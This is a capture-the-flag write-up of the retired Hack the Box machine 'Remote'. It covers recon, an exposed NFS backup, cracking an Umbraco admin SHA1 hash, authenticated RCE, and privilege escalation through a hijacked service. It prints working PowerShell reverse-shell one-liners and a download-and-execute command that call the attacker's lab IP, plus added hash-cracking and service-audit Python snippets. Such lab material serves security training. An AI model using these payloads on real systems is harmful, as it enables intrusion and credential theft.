Hack the Box Remote

Arcy Caparros
7 min read · Apr 12, 2021

My write-up on HTB’s retired machine “Remote”

Disclaimer

This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

Preface

HTB’s “Remote” box came out on March 21 ’20 with a difficulty of 4 out of 10 per user ratings. A newly released system always gets pounded in the race for first blood. At the time of this write-up, first blood took 2 hrs and 57 mins for user and 3 hrs and 4 mins for root.

Reconnaissance

First, let’s use nmapAutomator to automate the recon/enumeration process.

Summary of our nmap scan results:

nmap -T4 -p- 10.10.10.180 -oA 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 07:43 EDT
Nmap scan report for 10.10.10.180
Host is up (0.025s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49680/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 452.22 seconds

Enumeration

First, started checking 21/tcp. We can log in anonymously, but there’s nothing there.

root@cainta:~/Documents/htb/Remote# ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> pwd
257 "/" is current directory.

Moved on and started enumerating tcp/80, ‘http://10.10.10.180’

Performed Nikto scan

=========================Starting nikto scan- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.180
+ Target Hostname: 10.10.10.180
+ Target Port: 80
+ Start Time: 2020-06-04 04:32:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server banner has changed from '' to 'Microsoft-IIS/10.0' which may suggest a WAF, load balancer or proxy is in place
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3092: /intranet/: This might be interesting...
+ /umbraco/ping.aspx: Umbraco ping page found
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-06-04 04:38:18 (GMT-4) (320 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan=========================

Further digging around ACME turned up nothing that stands out, but our Nikto scan found /umbraco/.

After spending time exploring /umbraco/, I hit a brick wall and moved on. I remembered that we came across an ‘nfs’ service in our nmap scan results.

root@cainta:~/Documents/htb/Remote# showmount -h
Usage: showmount [-adehv]
[--all] [--directories] [--exports]
[--no-headers] [--help] [--version] [host]
root@cainta:~/Documents/htb/Remote# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

Mount /site_backups

root@cainta:~/Documents/htb/Remote# mkdir /tmp/nfs
root@cainta:~/Documents/htb/Remote# mount -t nfs 10.10.10.180:/site_backups /tmp/nfs/ -nolock
root@cainta:~/Documents/htb/Remote#
root@cainta:/tmp/nfs# ls -latr
total 123
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 28539 Feb 20 00:57 Web.config
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 App_Plugins
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 12:16 bin
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 css
drwx------ 2 nobody 4294967294 8192 Feb 20 12:16 Config
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 Media
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 scripts
drwx------ 2 nobody 4294967294 8192 Feb 20 12:16 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 Views
drwx------ 2 nobody 4294967294 4096 Feb 20 12:17 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 23 13:35 .
drwxrwxrwt 20 root root 4096 Jun 4 06:19 ..
root@cainta:/tmp/nfs#

So much to cover. Checking where we could find usernames: further research on Umbraco suggests they may be found in ‘App_Data/Umbraco.sdf’.

Tried to open the .sdf file, but it is not a text file. According to fileinfo.com, an “SDF file contains a compact relational database saved in the SQL Server Compact (SQL CE) format, which is developed by Microsoft. It is designed for applications that run on mobile devices and desktops and contains the complete database contents, which may be up to 4GB in size”.

Used strings and identified ‘admin@htb.local’ and the SHA1 hash ‘b8be16afba8c314ad33d812f22a04991b90e2aaa’

root@cainta:/tmp/nfs/App_Data# strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f

Cracked the SHA1 hash:

baconandcheese
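As an added example (not part of the write-up), a small Python audit helper that pulls the password-hash records out of `strings` output like the above and checks an unsalted digest against a wordlist. The sample lines are constructed from the records shown here; the point is that an unsalted SHA1 in a backup exposed over NFS is a one-lookup credential.

```python
import hashlib
import re

# Constructed sample input: records that `strings Umbraco.sdf | grep admin` printed in the
# write-up. SQL CE stores the columns back-to-back, so name, login, hash, hash config,
# locale and row GUID run together with no separator.
SDF_STRINGS = """\
Administratoradmindefaulten-US
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
"""

# Umbraco writes a JSON tag naming the algorithm directly after the hex digest.
TAG_RE = re.compile(r'([0-9a-fA-F]+)\{"hashAlgorithm":"([A-Za-z0-9]+)"\}')
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64}  # hex length of each unsalted digest

def find_hashes(text):
    """Return unique (hex_digest, algorithm) pairs found in strings output."""
    found = []
    for m in TAG_RE.finditer(text):
        algo = m.group(2).upper()
        n = DIGEST_LEN.get(algo)
        if n is None or len(m.group(1)) < n:
            continue  # unknown algorithm, or a hex run too short to be the digest
        # Columns run together, so a login ending in hex letters could extend the run
        # to the left; the digest is always the last n characters before the tag.
        rec = (m.group(1)[-n:].lower(), algo)
        if rec not in found:
            found.append(rec)
    return found

def sha1_hex(word):
    return hashlib.sha1(word.encode()).hexdigest()

def crack(hex_digest, algo, wordlist):
    """Unsalted, unkeyed digest: one hash per candidate is enough. None if no hit."""
    name = algo.lower()
    if name not in hashlib.algorithms_available:
        return None
    for word in wordlist:
        if hashlib.new(name, word.encode()).hexdigest() == hex_digest.lower():
            return word
    return None

if __name__ == "__main__":
    # Constructed mini wordlist; the write-up reports this digest resolves to 'baconandcheese'.
    words = ["password", "Welcome1", "baconandcheese"]
    for digest, algo in find_hashes(SDF_STRINGS):
        print(f"{algo} {digest} -> {crack(digest, algo, words)!r}")
```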

Went back to /umbraco and logged in with the username and password we found; we now have admin access.

Since we have confirmed that our Umbraco version is 7.12.4, searching for exploits led me to https://github.com/noraj/Umbraco-RCE (‘Umbraco CMS 7.12.4 — (Authenticated) Remote Code Execution’).

root@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0 2:

Connection-specific DNS Suffix  . :
IPv6 Address. . . . . . . . . . . : dead:beef::453a:bc1d:f838:7960
Link-local IPv6 Address . . . . . : fe80::453a:bc1d:f838:7960%13
IPv4 Address. . . . . . . . . . . : 10.10.10.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d57%13
10.10.10.2
root@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c hostname
remote
root@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c whoami
iis apppool\defaultapppool

Initial Foothold

Now that we have determined that we can run commands remotely, the first thing that comes to mind is Nishang’s ‘Invoke-PowerShellTcp -Reverse’. However, I could not get it working…

Begged, stole, and borrowed more ps scripts… found this!

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.37',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$sm=(New-Object Net.Sockets.TCPClient('10.10.14.37',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Save this as 'reverse.ps1'

python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.37:80/reverse.ps1')"

Serve via SimpleHTTP server

root@cainta:~/Documents/htb/Remote/10.10.10.180# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.180 - - [04/Jun/2020 08:36:02] "GET /reverse.ps1 HTTP/1.1" 200 -


Reverse shell
root@cainta:~/Documents/htb/Remote# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.37] from (UNKNOWN) [10.10.10.180] 49710

PS C:\windows\system32\inetsrv> cd c:\
PS C:\> dir


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/20/2020 1:13 AM ftp_transfer
d----- 2/19/2020 3:11 PM inetpub
d----- 2/19/2020 11:09 PM Microsoft
d----- 9/15/2018 3:19 AM PerfLogs
d-r--- 2/23/2020 2:19 PM Program Files
d----- 2/23/2020 2:19 PM Program Files (x86)
d----- 6/4/2020 5:47 AM site_backups
d-r--- 2/19/2020 3:12 PM Users
d----- 2/20/2020 12:52 AM Windows


PS C:\> cd Users
PS C:\Users> dir

User flag obtained.

PS C:\Users\Public> dir

Directory: C:\Users\Public

Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 6/4/2020 9:27 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-ar--- 6/4/2020 6:48 AM 34 user.txt

Privilege Escalation

Executed winPEAS.exe and found a possible way to escalate privileges.

Modified the BINARY_PATH_NAME of the usosvc service so it would launch nc.exe.

Started a listener on port 9999.

Once ‘sc.exe start usosvc’ is executed, the reverse shell comes back as nt authority\system.
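Added example, not part of the write-up: from the defender’s side, the weakness used above (a service whose binary path can be rewritten to an arbitrary executable and then started as SYSTEM) can be caught by auditing service configuration. This Python helper parses constructed `sc qc`-style output (the nc.exe drop path is assumed, and its arguments are omitted) and flags services whose image lives outside trusted directories or is a known shell/network utility.

```python
import re

# Constructed sample: `sc qc <service>` style output for two services. The first keeps its
# normal svchost path; the second is the write-up's scenario, with BINARY_PATH_NAME
# repointed at a dropped nc.exe (assumed path, arguments omitted).
SC_QC_OUTPUT = r"""
SERVICE_NAME: wuauserv
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs -p
        SERVICE_START_NAME : LocalSystem
SERVICE_NAME: UsoSvc
        BINARY_PATH_NAME   : C:\Users\Public\nc.exe
        SERVICE_START_NAME : LocalSystem
"""

TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SHELL_TOOLS = {"nc.exe", "ncat.exe", "cmd.exe", "powershell.exe"}

def parse_sc_qc(text):
    """One dict per service, keyed by the upper-case field names of sc qc output."""
    services = []
    for m in re.finditer(r"^\s*([A-Z_]+)\s*:\s*(.*)$", text, re.M):
        key, value = m.group(1), m.group(2).strip()
        if key == "SERVICE_NAME":
            services.append({})  # a new record starts at each SERVICE_NAME line
        if services:
            services[-1][key] = value
    return services

def image_path(binary_path_name):
    """Executable part of BINARY_PATH_NAME: a quoted path, else text up to the first space
    (an unquoted path containing spaces is itself a misconfiguration and is cut short here)."""
    p = binary_path_name.strip()
    if p.startswith('"'):
        return p[1:p.index('"', 1)]
    return p.split(" ", 1)[0]

def audit(services):
    """Return (service, severity, reasons) for services whose image looks hijacked."""
    findings = []
    for svc in services:
        img = image_path(svc.get("BINARY_PATH_NAME", "")).lower()
        reasons = []
        if not img.startswith(TRUSTED_DIRS):
            reasons.append("binary outside trusted directories")
        if img.rsplit("\\", 1)[-1] in SHELL_TOOLS:
            reasons.append("binary is a shell/network utility")
        if reasons:  # a hijacked service running as LocalSystem is a full SYSTEM compromise
            sev = "high" if svc.get("SERVICE_START_NAME", "").lower() == "localsystem" else "medium"
            findings.append((svc["SERVICE_NAME"], sev, reasons))
    return findings
```

On a live host the same checks apply to the output of `sc qc` for each service, or to the ImagePath values under the Services registry key.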

Lessons Learned:

  • The initial foothold is a bit challenging, but we have to ‘try harder’, look for other avenues and be creative.


InfoSec, Dad, Jack of All Trades and Master of None